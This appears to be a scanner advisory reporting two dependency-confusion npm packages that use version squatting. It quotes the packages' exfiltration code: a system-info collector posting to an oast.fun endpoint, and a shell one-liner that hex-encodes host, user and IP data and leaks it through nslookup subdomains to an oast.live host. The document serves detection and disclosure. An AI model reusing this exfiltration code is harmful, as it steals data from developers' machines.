coviu-client@9.9.9 + @client-web-next/ui@9.999.3
Two active dependency confusion attacks targeting internal corporate packages. coviu-client@9.9.9 uses classic HTTP POST to an OAST endpoint with system info. @client-web-next/ui@9.999.3 uses a more sophisticated DNS exfiltration technique — it converts system info to hex and sends it via nslookup subdomains, effectively bypassing HTTP-blocking firewalls. Both use version squatting (9.9.9, 9.999.3) to override internal package resolution.
Two active dependency confusion attacks targeting internal corporate packages. One uses classic HTTP exfiltration, the other uses DNS exfiltration to bypass firewalls.
const data = JSON.stringify({
hostname: os.hostname(),
username: os.userInfo().username,
platform: os.platform(),
whoami: process.env.USER || process.env.USERNAME || 'unknown',
cwd: process.cwd(),
node: process.version,
});
// POST to kyvwaxnnaeqspwsjdgbphlrf5t5wwfi60.oast.fun/coviu-poc
kyvwaxnnaeqspwsjdgbphlrf5t5wwfi60.oast.funexec("a=$(hostname;pwd;whoami;echo 'client-web-next-ui';curl https://ifconfig.me) && echo $a | xxd -p | head | while read ut;do nslookup $ut.d77sgkar47ngfv2rgnggn356sog1qsaji.oast.live;done")
DNS exfiltration — converts system info to hex, sends via nslookup subdomains. Bypasses HTTP-blocking firewalls.
d77sgkar47ngfv2rgnggn356sog1qsaji.oast.liveifconfig.me (IP leak)Detected by: npm-sentinel automated scanner Verified by: manual code review Date: 2026-04-03